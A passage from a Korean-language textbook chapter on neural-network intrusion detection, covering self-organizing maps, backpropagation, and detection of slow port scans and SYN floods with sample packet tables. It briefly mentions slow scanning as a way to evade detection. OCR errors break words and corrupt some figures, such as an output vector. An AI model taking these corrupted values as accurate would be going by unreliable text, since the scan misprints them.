한 상관연산을 실 행하여 그 자료를 신경 회 로망이 처 리할수 있는 무리 로 분해한다. 

먼저 침 입탐지 에 관한 몇 가지 기 본개 념 들을 소개 하고 우의 두가지 AI 기 초에 대 하여 
더 상세 히 고찰한 다음 그것들이 지 능적 인 침 입탐지체 계구성 에 어 떻게 리용되는가를 보 
기 로 하자. 여기서 론의되는 개 념체계는 죠지 아기술대 학의 죠지 아기술연구소에서 개발시 
험되였다. 

침입 탐지 

침 입탐지 의 목적 은 기 관의 보안방책 에 위 반되 는 활동을 식 별 하는것 이 다. 침 입람지 문 
제에는 본질적으로 다음과 같은 두가지 수법 즉 오용탐지와 변칙 ( anomaly ) 탐지가 있다. 
오용탐지 체 계 들은 공격 표적 즉 달갑지 않은것 으로 알려 진 활동패 런을 정 의한다. 이 체 
계 들은 공격 을 의 미하는 표적 의 존재 때 문에 체 계활동을 감시 하는데 온 시 간을 소비한다. 
례를 들면 IP 파케트가 모든 TCP 기발들이 설정된 대면부와 교차한다는것을 고찰하는 사 
탐은 아마도 XMAS 가 주사하는것을 알아 차리고 따라서 경보신호를 낼수 있다. 

이 수법 은 효과적 일수는 있지 만 여 러 가지 약점 이 있 다. 철저한 공격표적자료기 지를 
구축하는것 은 어 려 우면서 도 시 간을 소비하는 과제 이 다. 더우기 알려 진 공격 의 약간한 
변동은 그 공격 의 예 정된 표적 과 크게 차이날수 있고 오용탐지 기 가 그 사고를 총체 적으 
로 놓치 는 결 과를 초래할수 있 다. 사람들은 알려 진 공격 을 특별 히 주시하므로 오용탐지 
기들은 보통 표적이 자료기지에 없는 새로운 공격은 식별하기가 어렵다. 오용탐지기들은 
정의 허위보다 부의 허위 를 더 많이 가지 고 있을 경 향이 있다. 

변칙탐지체계는 각이한 원리 에 기 초하고 있다. 변칙탐지 기들은 접수할수 있는 체 계 
활동모형 을 정 의 하고 그 모형 에 조화되 지 않는 행 동들은 식 별 한다. 변칙탐지 기 들은 구체 
적 인 침입들이 무엇으로 보이는지를 알지 못하며 오히 려 정상적 인 행동이 무엇으로 보이 
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는가를 알며 정상상태로부터의 기발편차를 잠재적인 침입으로 리해한다. 례를 들어 한 
회 사의 쏘프트웨어 기사가 한주일동안 매 일 아침 7시와 9시사이에 체계 에 가입 하고 오후 
5〜6시사이에 등록을 해제 한다고 가정 하자. 그리고 쏘프트웨어 기사가 주말에는 체계 에 
절대 로 가입하지 않는다고 하자. 한 기사가 월요일 에 출근하여 다섯명의 쏘프트웨어기사 
모두가 전날 일요일 아침 2시 에 체계 에 가입하였다는것을 알았다고 가정 하자. 이 행동은 
비정상적인 행동으로 부각되며 비합법적인 활동의 표식으로 될수 있다. 이 변칙을 식별 
함으로써 잠재 적 인 침 입 을 식 별 한다. 

변 칙 탐지 체 계 들은 일 정 한 정 황속에 서 는 충분하지 만 그 자체 토는 풀기 어 려 운 난점 도 
포함하고 있 다. 불량행 동을 량적 으로 모형화하기 어 려운것 과 마찬가지 로 접 수할만한 행 
동을 모형화하기도 어렵다. 변칙탐지기들욘 대규모환경에서는 자주 발생하는 체계리용방 
식에서의 불의의 변화에 적응하기 어렵다. 

이 장에서 서 술되는 패 턴정 합침 입탐지체계는 오용탐지수법 에 따른다. 그 착상은 신 
경회로망이 입력을 일반화하고 그 입력의 외적인 변화를 인식하는 능력을 리용하는것이 
다. 체 계는 신경회 로망에 기초한 공격의 변동을 인식하여 전통적 인 오용탐지 기들이 발생 
하는 부의 허 위중에 서 많은것 을 피 하여 야 한다. 

일반화는 체계로 하여금 공격이 조금 변화되였지만 기본적으로는 원래것과 같다는것 
을 인식하게 한다. 신경회 로망은 표적 에 기 초한 체 계의 범위를 벗 어 난 변화도 인식할수 
있어야 한다. 더우기 일반화는 체계로 하여금 일반적으로 특수한 공격이 아닌 공격을 표 
시 하는 조건을 인식하게 한다. 만일 총체 적 으로 새 로운 공격 들이 그 특성 들을 나타낸다 
면 체계는 그 공격들을 이전에 본일은 없지만 식별할수도 있다. 

신경회로망 

신경회 로망침 입람지체 계를 구축하기전에 신경회 로망의 몇 가지 기본개 념들을 보기 로 
하자. 침 입탐지체 계의 구성 에 대 한 론의 로 이 행하면서 일부 개 념들을 더 깊이 고찰하고 
그 기본기능들을 확장한다. 

다빈치 의 지 능원리 들은 문제 풀이 에 서 상사성 에 주의 를 돌리 게 한다. 레 오나르드 다 
빈치 는 사람들이 어 느날에 어 떻게 새들처 럼 날수 있는가를 더 잘 리해 하기 위하여 새들 
이 나는 방법을 관찰하였다. 콤퓨터를 더 위력하고 효률적인 문제풀이기계로 발전시키기 
위하여 노력하면 자연히 이미 알려 져 있는 가장 위력한 정보처리체계인 인간지능에 마 
음이 끌리 게 된다. 련결성 ( connectiomst ) AI 리 론에 서 는 인간뇌 수가 바로 감각，추리 및 학 
습과 갈은 과제실행 을 쉽 게 할수 있 다고 추측한다. 그 리 론에 의하면 만일 뇌수모방(수 
자식를퓨터모방에 기초하는것이 아니다)에 기초한 계산모형을 구축한다면 콤퓨터는 인간 
지 향적 인 과제 들의 일 부를 능숙하게 실 행할수 있 다. 신경 회 로망은 그러한 련결성모형 의 
하나이다. 신경회로망은 뇌수의 동작을 정확히 모방하는것 이 아니 라 오히 려 뇌수의 기능 
방식 으로부터 령감을 유도하여 인 간지능의 일 부 능력 을 달성하려 고 한다. 

신경회로망은 두개의 기본요소 즉 단순한 처 리요소와 그 요소들사이의 무게 붙은 결 
합으로 구성된다. 신경회로망은 처리요소들이 서로 독립적으로 동작하므로 병렬도가 높 
은 체계이다. 결국 망조종은 망의 처리요소들에 대한 조종으로 된다. 련결성모형에서 처 
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리요소들사이의 무게는 체계의 지식을 표현한다. 

신경회로망은 주어 진 입력이 이전 경험으로부터 학습을 통하여 알려 져 있는 패런 
과 정합되는 패 턴정합문제에서 특히 유용하다. 또한 신경회로망은 불완전하거나 혹은 변 
동되는 패턴실례들을 인식하는 근사정합을 수행하는 경향을 보여 주고 있다. 여기서 리 
용하는 신경회로망의 형태인 다층역전파망은 인기가 있으며 신경회로망을 리용하는 대다 
수의 실천응용에서 리용되고 있다고 보아 진다. 이 회로망은 패런정합문제에 대하여 확 
증된 기록을 가지고 있다. 다층역전파망에 대하여서는 후에 더 구체적으로 고찰된다. 여 
기서는 그 망의 보다 단순한 조상인 퍼썹트론에 중심을 둔다. 



출력 


입력 무게 합계 럭값 

그림 36-1. 간단한 퍼썹트론 

퍼썹트론은 가장 단순한 신경회로망이다. 퍼썹트론은 2진값의 입력백토르와 실수값 
의 무게벡 토르를 가지 며 두 벡 토르의 벡 토르적 을 계 산하는 망이 다. 그 결과는 퍼썹 트론 
에 대 하여 2진값출력 을 발생하는 턱 값함수에 적 용된 다(그림 36-1 참고). 



패런정합체계로서 이 회로망은 어떤 입력이 단일한 개념과 정합되였는가를 알수 있 
게 하지만 그이상의 결과는 주지 못한다. 여러개의 패런들을 구별할수 있는 패턴정합체 
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계를 구성하기 위하여 다중처리요소들을 단일한 입력백토르로 맺을수 있다. 사과와 딸기 
그리고 배를 식별하는 그림 36 — 2의 단순한 회로망을 고찰하자. 매개 처리요소는 그에 
대 응하는 출력 에 대 한 2진값을 계산한다(단순한 퍼썹트론의 경우와 같다). 

세 원소를 가지 는 출력 벡 토르는 입 력 백 토르와 정 합된 패 턴을 가리킨다. 례 를 들어 
이 회로망이 껍질은 붉은색이고 살은 흰 과일(입력벡토르 [1，0, 0, 1]) 로 본다면 그 회로 
망은 매 개의 가상처 리 기 에서 다음의 결과들을 산생할것 이 다. 즉 사과 2, 딸기 -2, 배 -2. 
턱값함수는 만일 입력이 정이라면 1을 산생하고 기타 경우에는 0을 산생한다. 따라서 최 
종적인 출력벡토르는 以， o , 이이며 이것은 과일이 사과라는것을 가리킨다. 과일의 껍질이 
붉은색 이고 살도 붉은색 이라고 가정 하자(입 력벡 토르 [1, 0, 1, 이). 그 합은 각각 -2, 2, -6 
일것 이 다. 결국 출력벡 토르는 [0, 1，이이며 이 것은 과일 이 딸기 라는것 을 가리킨다. 이 단 
순한 회 로망은 많은 경 우(배 들가운데 서 누런 사과를 인식하는것 과 갈은)에 는 분명 히 난 
점 이 있지 만 퍼 썹 트론패 런정 합의 기 본개 념 을 례 증한다. 

임의의 신경회로망지식은 그 처리요소들사이의 무게로 부호화된다. 과일분류기와 같 
은 단순한 회로망에서는 그 무게를 수동적으로 결정하는것 이 어 렵지 않다. 그러 나 회로 
망의 규모가 증가하여 복잡한 패턴들에 정합시켜야 할 경우에는 수동적인 무게결정 이 무 
의 미하게 된 다. 련결성모형 의 위 력은 회 로망이 학습한다는것 이 다. 다시 말하면 신경 회 로 
망은 교사 있는 학습과정을 통하여 자기의 지식을 전개한다. 

패턴정합식침입탐지체계 


일 반적 으로 침 입 탐지 절 차는 다음과 같은 5개 단계 로 구성 된 다. 

1. 원자료의 수집. 이 실례에 대해서는 IP 파케트가 리용되지만 그 원자료는 사용기록 
부기입 내용 (log entty ) 일수도 있고 어 떤 환경 에서의 활동의 임의의 다른 계 량척도 
일수도 있다. 

2. 원자료에서 자료요소추출. 이 자료요소들은 의미를 가져야 하지만 기본적인 특징 
을 가지는것이여야 한다. IP 파케트에 의하여 자료요소들은 원천주소와 목적주소， 
규약형태，기발들 그리고 유효자료에 대한 일부 정보들을 포함하여야 한다. 

3. 선택된 자료요소들을 하나의 혼적으로 맺기. 련관된 항목들은 총체적으로 분석될수 
있는 단일한 단위로 집중될수 있다. 례를 들어 TCP 대화시간내의 파케트들은 하나 
의 흔적으로 무리 지어 질수 있다. 

4. S 적이 공격인가를 판별하기 우 I 한 평가. 여기에 지식이 적용된다. 인간의 지식(혹은 
체계의 지식)에 기초하여 평 가되 여 야 할 흔적 에 공격 을 의미하는 특성 들이 존재 
하는가를 판단한다. 

5. 출력발생. 이 최종단계에서 체계는 흔적에 대한 판결을 내리고 그 흔적이 공격인 
가 아닌 가를 지 적한다. 
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이것은 침입탐지의 일반적인 절차이며 대부분의 오용탐지기들은 류사한 방법론에 따 
른다. 이 절에서 고찰하는 AI 식방식도 역시 그 방법 론을 리용하지 만 효률성 을 개선할 목 
적으로 일부 최신기 술을 적 용한다. 구체 적으로 체계는 자체 구성 사영 ( self-organizing map ) 
이 라고 하는 발견수법 을 리용하여 자료요소로부터 흔적 을 구성하며 다층역 전파망 (multipl 
ayer backpropagation network ) 으로 알려 진 패 런정 합기 술을 리용하여 공격 의 존재 여 부를 
조사하기 위하여 흔적 을 평 가한다. 이 개 념 들은 후에 더 구체 적 으로 서 술된 다. 

이 례증은 신경회 로망에 기 초한 침 입탐지 에 중심 을 두지만 그 개 념들은 다른 형식의 
침 입람지 에 도 직 접 적 용될 수 있 다. 

자료수집과 추출 

침 입탐지방법 론의 첫 번째 및 두번째 단계 는 보통 현존도구들과 기 술을 응용하여 달 
성 할수 있다. IP 파케트의 실례 에서는 파케 트를 획득하기 위 하여 망엿 보기 장치 ( sniffer ) 나 
이 러 저 러 한 대 면부가 리 용된 다. 파케 트해 신기 는 획 득된 파케 트에 서 자료요소들을 해 부하 
고 추출하는데 리 용된다. 체 계 운영기록 (system log ) 인 경우에는 체 계의 모든 기 록입구점 들 
을 획 득하기 위하여 원격 운영기 록봉사기 가 리용되 며 자료요소들을 추출하는데는 단순한 
표준적인 표현분석기가 리용된다. 

혼적구성 

사람들의 감각기관은 많은 원천으로부터 끊임없이 많은 자료들을 받고 있다. 이 원 
자료들은 인간지 능이 처 리할수 있는 자료단위 로 해부되 고 결 합된다. 망련결 에 도 류사한 
현상이 있다. 망련결은 가변적인 원천，목적지，규약 및 선택을 가지는 파케트들을 끊임 
없 이 받고 있 다. 신경 회 로망을 리용하여 망통화량에 서 공격 패 턴을 인식 하자면 우선 그 
자료들을 의 미 있는 집 합 즉 신경 회 로망이 처 리할수 있는 자료단위 로 구성하여 야 한다. 
이 자료단위를 흔적 이 라고 부론다. 

자체구성사영 ( SOM ) 은 원래의 감각적인 입력으로부터 추출된 자료요소를 처리가 진 
행되는 의미 있는 큰 무리 ( duster ) 로 변환하는 하나의 수법이다. SOM 은 본질적으로 신경 
원형 의 세 포로 이 루어 진 2차원격 자이다. 변환함수는 입 력 벡 토르에 존재하는 값들에 기 
초하여 사영되는 일정한 세포들을 려기시 킨다. 그림 36 — 3에 보여 준것 처 럼 SOM 은 입 력 
들의 상관관계를 구하여 사영 내에서 위상구조적 인 이웃들이 입력벡토르와 일정한 기본특 
징들을 공유한다는것을 담보한다. 

그림 36 — 3은 두가지 위상구조적인 이웃모임이 려기된 작은 SOM 의 개념적인 표현 
을 보여 준다. 서로 가까운 무리들은 사영에 련관이 있는 입력이 제시될 때 려기된다. 사 
영되는 무리는 그 무리안의 세포들을 려기시키는 입 력벡토르에 대 한 지표이 다. 이 그림 
의 사영은 두개의 무리를 보여 준다. 입력벡토르들은 론리적으로 두개의 콜라스로 무리 
지 어 진 다. 이 침 입 탐지 체 계 에 서 매 개 무리 는 흔적 을 표현 한다. 
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SOM 은 교사 없는 학습과정을 통하여 련관된 입력을 분류한다. 교사 없는 학습에서 
체계는 그 무리들이 무엇과 같은가에 대한 어떠한 사전지식이 없이 자료요소들을 련관된 
항목들의 무리 로 구성한다. 신경회 로망은 자료요소들이 어 떻게 무리 지 어 지 는가를 자체 
로 결 정한다. 교사 없는 학습은 흔히 교사 없 는 학습과정 에 앞서 입 력 공간의 기 본특징 들 
을 발견하기 위하여 여 기 에 서 와 같이 리 용된 다. 

SOM 학습에 서 변환함수의 파라메터 들은 우연값으로 초기 화된 다. 그러 나 매 개 입 력 벡 
토르는 사영에 순차적으로 제시된다. 매개 입력벡토르에 대하여 SOM 은 자기의 변환함수 
를 적 용하여 수값을 발생한다. 그 수값은 사영 의 어 느 세 포들이 려 기 되 여 야 하는가를 결 
정한다. 그러면 SOM 은 입 력벡토르들이 얼마나 잘 무리 지 어 졌는가를 측정하는 오차함 
수를 계 산한다. 그 결과에 기 초하여 SOM 은 변환함수의 파라메터 들을 오차함수의 크기 를 
감소시키도록 조절한다. 오차함수가 작다는것은 한 무리의 벡토르들사이에 강한 상관관 
계 가 있 다는것 을 의 미한다. 

SOM 은 다음으로 다음번 입력벡토르에 대하여 우에서 언급한것과 같은 연산을 반복 
한다. 모든 입력벡토르들이 처리되면 한 주기가 완성된다. 그 다음 SOM 은 다른 주기를 
실 행하여 모든 입 력 벡 토르들을 순차적 으로 처 리 하고 그에 따라 변환함수의 파라메터 들을 
조절한다. 매개 무리의 벡토르들의 상관관계는 매 주기마다 개선된다. 그 상관관계가 어 
떤 예정된 턱값에 도달할 때 까지 SOM 은 매 주기실행 을 계속한다. 학습과정 이 끝난 후 
변환함수의 파라메터들은 고정되며 체계는 연산방식으로 이행한다. 

SOM 의 출력 은 주어 진 무리 에 의한 첨 수를 가지 는 자료요소의 표현 이 다. IP 통화량 
에 적용될 때 그 표현은 파케트들의 집합 혹은 흔적 이다. 이 흔적은 패턴정합체계의 입 
력 벡토르로 된다. 흔적 그자체 를 회 로망의 입 력 으로 리용하는 외 에 사람들은 그 흔적 에 
대 한 일부 기 본통계량들(평 균크기，파케 트계 수，파케 트빈 도수 등과 갈은)을 계 산하여 패 
런정합체계에 제공한다. 
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이 체계에서 SOM 은 원래의 IP 파케트로부터 추출된 자료가 사영의 입력으로 적용될 
때마다 출력을 발생한다. 이렇게 되면 순간적으로 포착되는 일부 흥미 있는 림시분석능 
력이 생긴다. 

a 적평가 

퍼썹 트론은 앞에서 단순한 패 런정 합체계로 소개되 였다. 그러 나 단순한 퍼썹 트론으로 
구성된 망은 주요한 제한성을 가지고 있다. 이 망들은 상대적으로 엄격한 일부 한계점들 
에 부담되는 일정한 형태의 입력공간에 대해서만 리용될수 있다. 그 리유는 퍼썹트론이 
단순한 개념들만을 인식할수 있다는 사실에 있다. 보다 견고한 패런정 합체계를 구성하자 
면 복잡한 특징을 가지는 복잡한 개념들을 인식할수 있는 능력이 필요하다. 이것은 단순 
한 퍼쌩트론의 확장인 다층역전파망을 리용하여 달성할수 있다. 

다층회로망은 그림 36 — 4에 보여 준것처럼 또 하나의 처리층을 추가하는 방식으로 
단순한 퍼썹트론모형을 확장한다. 숨은 층은 복합특징들을 표현하는데 리용된다. 그 숨은 
층의 매 개 요소들은 학습을 통하여 단일한 복합특징 을 인식할수 있다. 여 러개의 숨은층 
을 가지 는 회 로망은 많은 복합특징 들을 가지 는 복잡한 개 념 들을 인식할수 있 다. 



그림 36-4. 다층역전파회로망 


학습. 신경 회 로망의 가장 흥미 있는 특성 은 학습능력이 다. 회 로망은 주요개 념 들에 대 
한 그자체의 내부표현을 전개하여 지식을 구축한다. 신경회 로망의 위력은 사람이 신경회 
로망에 그 개념들을 프로그람화하지 않아도 된다는데 있다. 다시 말하면 사람은 그 개념 
들이 무엇인가를 알지 않아도 된다. 숨은층의 요소들은 백판 즉 령으로 시작하며 회로망 
은 어떤 개념들이 전반적인 문제에 대한 기본열쇠인가를 결정하게 된다. 회로망은 그 개 
념들을 표현하기 위하여 숨은층의 처 리 요소들을 전개한다. 

신경회로망패런정합기는 교사 있는 학습과정을 통하여 학습한다. 교사 있는 학습에 
서는 일련의 훈련입력들과 그에 대응하는 정확한 출력들이 패턴정합체계에 제시된다. 이 
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것은 회로망이 정확한 답이 무엇이여야 하는가에 대한 개념에 기초하여 학습하게 한다. 
회로망은 모든 입력패턴들에 정확히 정합되게 하는 무게를 결정한다. 만일 훈련패런모임 
을 품을 들여 잘 제시한다면 회로망은 학습을 통하여 매우 높은 정확도로 패턴들을 정합 
시킬수 있 다. 

기본학습알고리듬은 다음과 같다. 회로망의 모든 무게들은 -0.1 과 0.1 사이에서 우연 
값으로 초기화된다. 매개 입력벡토르는 순차적으로 회로망에 제시된다. 입력벡토르가 제 
시되면 회로망은 입력층의 려기를 0과 1사이의 실수를 발생하는 려기함수에 기초하여 숨 
은층에로 전파한다. 이 모호결과(엄밀한 불대수의 0과 1려기와는 반대로)는 주요특징들이 
입력벡토르에 존재하는 정도를 더 정확하게 반영할수 있게 한다. 다음으로 숨은층의 려 
기는 갈은 려기함수에 의하여 출력층에로 전파된다. 이 과정을 정방향전파과정 이 라고 부 
르며 출력 요소는 0과 1사이 의 실수를 발생한다. 

출력층이 일단 려기되면 계산결과와 알려 져 있는 정확한 결과사이의 오차함수 
를 계산할수 있다. 그 오차에 기초하여 회로망의 무게들은 오차함수의 크기가 감소 
하도록 조절되며 회로망은 다음번 입력에로 이행한다. 무게조절과정을 역전파라고 
부론다 • 

모든 입력벡토르들이 처리되면 한 주기가 끝난다. 회로망은 오차함수의 크기가 
허용수준으로 감소될 때까지 주기를 반복한다. 일단 그 과정이 완결되면 회로망은 
학습을 통하여 회로망에 제시된 입력벡토르에서 패린들의 존재를 인식한다. 모든 
신경 회 로망학습과 마찬가지 로 신경 회 로망의 정 확성 은 단지 학습과정 에 표본패 턴들 
에 대하여 획득하는 경험에 의존한다. 결국 충분한 훈련공간을 선택하는것이 관건 
적 이 다. 

침입탐지체계를 숙련시킬 때 체계는 허용된 회로망통화량과 이미 알고 있는 모든 공 
격들을 체계적으로 받는다. 만일 체계가 공격통화량에 대해서만 훈련된다면 회로망은 학 
습을 통하여 공격으로 간주하는 모든것을 인식한다. 만일 체계가 허용된 통화량에 대해 
서만 훈련된다면 그 역이 성립한다. 효률적인 학습을 담보하자면 두 경우사이의 균형이 
필요하다. 

연산. 일단 학습과정이 완성되면 신경회로망의 무게들은 고정되고 체계는 연산준비 
가 완료된다. 연산하는 동안에 입 력벡토르 ( SOM 무리짓기사영의 흔적출력)는 다층역전파망 
의 입 력마디 점 에 적재된다. 회 로망은 학습할 때 리용한 갈은 려기 함수에 기 초하여 입 력 
층의 려기를 숨은 층에로 전파한다. 다음 숨은 층의 려기는 학습과정에서와 곡 마찬가지 
로 출력층에 전파된다. 출력층이 일단려기되면 결과가 발생된다. 

그 결과는 0과 1사이 의 실수값이 므로 사람은 그 결과만이 아니 라 려기의 크기 에 기 
초하여 행동을 취 할수 있다. 례를 들어 0.9 이상의 임의의 려기를 즉시적 인 응답을 요구하 
는 공격으로 통보하고 그리고 0.75 〜 0.89 의 임의의 려기를 더 고찰해 보아야 할 흥미 있 
는 사건으로 통보하는 턱 값함수를 리용할수 있 다. 
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가동하는 체계 

체계가 들어 오는 통화량을 평가하여 공격패런의 존재를 어떻게 판별하는가를 관찰 
하자. 그림 36—5는 총체적인 체계의 개념적인 례증이다. 

IP 파케 트를 획 득하는데 엿 보기 도구 ( sniffer ) 가 리 용된 다. 그 패 기 트는 해 신되 고 주 
요한 자료요소들은 추출된다. 이 자료요소들은 하나의 단위 로 묶어 져 자체구성사영 
의 입력으로 작용한다. 사영은 그 파케트와 주요한 특성들을 공유하는 다른 파케트를 
함께 무리 지어 놓으며 새로운 파케트와 그것의 위상구조적인 이웃들을 포함하는 흔 
적 을 출력한다. 그 흔적 은 그 자료에 대 하여 출력층에 로 려기를 전파하는 신경회 로망 
의 입력으로 작용한다. 출력려기에 기초하여 흔적은 공격과 공격이 아닌 흥미 있는 
사건으로 식별된다. 

포구스캔탐지 

공격 자들은 흔히 실제공격 목표를 식 별 하기 위하여 포구스캔 (port scan ) 을 진행한다. 
그것은 어떠한 직접적인 손상도 주지 않지만 사람들은 포구스캔을 그의 악성적인 의도로 
하여 공격 으로 취급한다. 직 접적 인 포구스캔은 탐지 하기 가 비 교적 쉽다. 갈은 원천주소와 
같은 목적주소 그리고 매개 목적포구가 스캔된다. 그러나 만일 공격자가 례컨대 하나의 
포구를 2〜3시 간마다 스캔하는 방법 으로 여 러 번 스캔을 반복한다면 침 입탐지체계 를 피할 
수도 있다. 

자료요소들로부터 흔적 을 구성하는 방법 은 독특한 림시분석 능력 을 제 공한다. 패 캐트 
들이 무리 에 추가될 때 그 무리 는 흔적 을 발생한다. 만약 무리 들이 충분한 시 간동안 
SOM 에 머무르게 된다면 보충적인 파케트들은 비록 그것들이 긴 시간동안 공간적으로 
퍼지지만 수신될 때에는 흔적에 추가될것이다. 이것은 긴 시간에 걸쳐 들어 오는 파케트 
들의 상관관계를 제공하여 침 입탐지체 계를 피 하려 는 느린 스캔수법 을 적 발하게 한다. 
SOM 은 시간경과카메라의 역할을 하여 시간별로 널려 있는 사건들에 대하여 단일한 흔 
적 으로 상관관계를 맺게 한다. 

SYN 범람탐지 

SYN 범람공격은 최근년간 특별히 통용되는 봉사거부공격으로서 협동공격과정의 한 
부분으로 흔히 리용된다. TCP - SYN 파케트들을 하나의 견본으로 포함하는 두개의 류사한 
흔적을 리용하여 이 체계가 실제의 SYN 범람공격과 실제로 매우 정상적인 Web 통화량인 
표면상의 SYN 범 람을 다 어 떻게 인식 하는가에 대 하여 더 잘 리해할수 있다. 
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표 36-1 SYN 파케트 


마 당 

값 

시 간도장 

0.9 : 30 : 29 : 4257 

원천 주소/포구 

공격자 : 320 

목적 주소/포구 

봉사기 : 23/TCP(Telnet) 

기발 

S(TCP-SYN) 

순서 번호 

1094689872 

ACK 번호 

1094689872 


표 36_1에 례증된 파케트를 고찰하자. 이것은 봉사기와의 Telnet 련결의 첫 파케트인 
SYN 파케트이 다. 그 파케트들중 여 덟개 혹은 아홉개 가 1초 혹은 2초간격으로 보여 지며 
그 파케트들은 다음의 사항을 가진다고 가정하자. 

• 갈은 목적주소 

• 23/TCP(Telnet) 의 목적 포구 

• 원천포구가 증가하는 갈은 원천주소 

• 증가하는 순서번 호와 ACK 번 호들 

• 같은 TCP 기 발들，구체 적 으로 TCP-SYN 

SOM 은 파케 트들이 서 로 련관이 있 다는것 을 인식하며 그것 들을 하나의 흔적 에 함께 
무리 지 어 놓는다. 류사한 파케트가 접수될 때마다 SOM 은 그것을 무리에 추가하고 신경 
회 로망에 의하여 평 가되 도록 갱 신된 흔적 을 출력한다. 상기할것 은 흔적 그자체 와 흔적 에 
대 한 몇 가지 기 본통계량들이 신경 회 로망의 입 력 으로 작용한다는것 이 다. 그 활동의 첫 2 
〜 3jus 에서 신경회 로망은 SYN 파케 트의 빈도수가 높지 만 파케 트계수는 상대적 으로 낮다 
는것을 볼수 있다. 학습하는 동안에 신경회로망은 우에서 언급한 특성과 련관시킬 때 
SYN 범 람공격 을 구성하는 파케 트계 수 및 파케 트빈도수의 결 합관계 를 학습한다. 결 국 
SOM 이 더욱 더 많은 파케트들을 무리 지어 놓을 때 우에서 언급한 모든 특성들이 최종 
흔적 에 계 속 존재하여 파케 트계 수 및 빈도수통계 량은 증가한다. 그러 면 흔적 패 런은 SYN 
범 람공격의 패턴과 정합되기 시작한다(숙련하는 동안에 신경회로망이 학습하는 내부표현 
에 의하여 정의 되 는). 턱 값에 도달되 면 신경 회 로망은 공격 을 의 미하는 출력벡 토르를 발 
생 한다. 

신경 회 로망은 학습을 통하여 실제 적 인 SYN 범 람공격 에 대 한 훈련에 의하여 우의 패 
턴을 공격과 일 치시키는 흔적을 인식한다. 그러면 다음의 특성 을 나타내 는 흔적을 발견 
하였다면 어떤 일이 생기는가. 
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• 갈은 목적주소 

• 목적 포구 135/TCP(Net BIOS) 

• 가변적인 원천주소 및 포구 

• 같은 TCP 기 발들，구체 적 으로 TCP-SYN. 

원천주소와 포구가 변한다 해도 신경회로망은 여전히 이 공격을 SYN 범람공격으로 
인식할수 있다. 명 심할것은 체계 가 그 씨 나리오에 대 하여서는 명 시적 으로 훈련되지 않았 
다는것 이 다. 

벡 토르의 벡 토르적연산은 신경 회 로망내 에 서 마디점 려기 함수를 계 산하는데 리 용된 다. 
만일 원래 흔적의 세번째 특징 이 제 시 된다면 입 력 벡 토르의 대 응하는 요소는 0으로 되 며 
벡 토르적연산의 결 과는 감소된 다. 그 감소는 SYN 범 람공격 의 총체 적 인 묘사에 서 그 특징 
의 중요성 에 비례한다. 그 세번째 특징은 공격의 가장 지배적 인 특징 은 아니 므로 그 감 
소는 상대적으로 작다. 만일 흔적의 기타 모든 사항들이 변하지 않는다면 그 감소는 신 
경회로망이 그 공격을 놓칠수 있게 하는데 충분할수도 있다. 

그러나 더 많은 파케트들이 접수될 때 파케트계수는 증가할것이며 입력벡토르의 
그 요소를 증가시 킨다. 이 것은 벡 토르적연산의 결과를 증가시 킨다. 그 증가는 SYN 범 
람특징 으로서 의 《 파케 트곁 수》의 우세정 도에 비 례한다. 그 특징 은 SYN 범 람의 묘사 
에서 매우 중요하므로 그 증가는 상대적으로 크며 다른 특징의 제거로 초래되는 감소 
를 보상하는데 충분하다. 이것은 려기함수가 공격경보신호를 내는 턱값이상으로 증가 
하게 한다. 

이제 원래 SYN 범람실례로부터 약간 변경된 또 하나의 파케트를 고찰하자(표 36 — 2 
참고). 그것은 봉사기와의 HTTP 접속의 첫 파케트인 SYN 파케트이다. 그것들 가운데서 여 
덟개 혹은 아홉개의 파케트들이 1초 혹은 2초간격으로 보이며 그 파케트들은 다음의 사 
항을 가진다고 가정하자. 

• 갈은 목적주소 

• 목적 포구 80(HTTP) 

• 원천포구가 증가하는 갈은 원천주소 

• 증가하는 순서번 호와 ACK 번 호 

• 같은 TCP 기 발，구체 적 으로 TCP-SYN 

앞의 실례 에서 와 마찬가지 로 SOM 은 그 파케트들이 서 로 련관이 있다는것을 인식하 
고 그것들을 하나의 흔적에 무리 지어 놓는다. 그러나 흔적이 회로망에 제시되면 그것이 
SYN 범 람패 런과 비 슷해 지 기 시 작해 도 그것은 공격신호로 되 지 않는다. 이 실례 와 앞의 
실 례사이 의 차이 는 목적 포구/봉사이 다. HTTP 의 특성 으로 인하여 많은 SYN 파케 트들을 이 
와 같이 순차적으로 보는것이 정상이다. 신경회로망이 학습하는 동안에 허용된(즉 비공 
격) 통화량의 표본들로서 HTTP 접속을 신경회로망에 제공하였다고 가정하면 신경회로망 
은 그 차이를 인식하고 그 활동에 대하여 SYN 범 람으로 경보신호를 내는것을 취소할것 이 
다. 신경회로망안에서는 일반적인 SYN 범람패런에 대한 이 례외가 목적포구 80/TCP 에 대 
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응하는 입 력마디 점 으로부터 의 큰 부 (-) 의 무게값으로 표현된 다(혹은 다른 봉사는 25 /TCP 
혹은 443/ TCP 와 같은 정의 허위 SYN 범 람경보신호를 낼수도 있다). 입력마디점 이 능동일 
때 접 속은 신경 회 로망안에 서 SYN 범 람려기 에 기 여하는 다른 입 력특징 들을 모두 강하게 
억제한다. 그러 므로 목적포구는 회 로망이 일반적 인 SYN 범 람패 턴에 대 한 이 례외를 인식 
하게 된다. 


표 36-2 SYN 파케트 


마 당 

값 

시 간도장 

0.9 : 30 : 29 : 4527 

원천 주소/포구 

공격자 : 320 

목적 주소/포구 

봉사기 : 80/ TCP ( HTTP ) 

기발 

S ( TCP - SYN ) 

순서 번호 

1094689872 

ACK 번호 

1094689872 


개 념 확 장 


개 념모형은 여 러 가지 방법 으로 확장될수 있다. 여 기서는 그 몇 가지 가능성 을 고찰 
한다. 

체계는 흔적이 공격인가 아닌가에 대한 판결만이 아니라 공격이 어떤 종류로 나타나 
는가에 대한 일부 표시까지도 넘겨 주도록 확장하는것이 더 좋다. 이 수법의 하나의 결 
함은 훈련자료에 상당한 량의 추가정보를 제공해야 한다는것이다. 이것은 공격훈련자료 
에 대 한 정보를 회 로망에 제공할 필요가 거의 없다는 우점을 해소한다. 

또하나의 확장은 련속인 학습모형 의 응용과 관련된 다. 회 로망의 초기학습주기 가 끝 
난 다음에도 학습과정을 중단하는것이 아니라 련속하면 회로망은 그것의 실지 경험에 기 
초하여 지식표현을 주기적으로 조절하게 된다. 이 수법의 잠재적인 목적은 체계가 환경 
의 변화에 적응하고 그 환경변화를 학습하도록 하는것 이 다. 

SOM 구조와 관련한 난점의 하나는 들어 오는 파케트가 그 흔적과 함께 평가될수 있 
도록 어떤 무리에 속해 야 한다는것 이다. 그러나 만일 SOM 이 들어 온 파케트를 잘못 분 
